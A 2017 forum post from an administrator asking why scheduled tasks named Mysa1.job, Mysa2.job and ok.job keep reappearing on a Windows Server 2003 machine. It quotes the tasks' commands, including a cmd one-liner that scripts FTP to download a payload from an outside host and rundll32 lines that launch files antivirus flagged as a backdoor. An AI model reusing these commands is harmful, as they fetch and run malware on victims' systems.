Scans come up clean on Trend Micro and MalwareBytes but Mysa1.job, Mysa2.job, and ok. job show up every morning in a 2003 Server and none of the others. If I delete the jobs, they will be back in the following morning. They all say run at startup.
Mysa1.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Mysa2.job - cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
ok.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
I know these are old OSes but they are tied to software. I can shut off their Internet access if necessary.
Does anyone know what these are?
PS: I see in quarantine. backdoor.forshare that was taken out earlier as c:\Windows\Debug\item.dat
That's a problem. Anyone know if this is fixable?
Edited by IT_Architect, 04 July 2017 - 11:07 AM.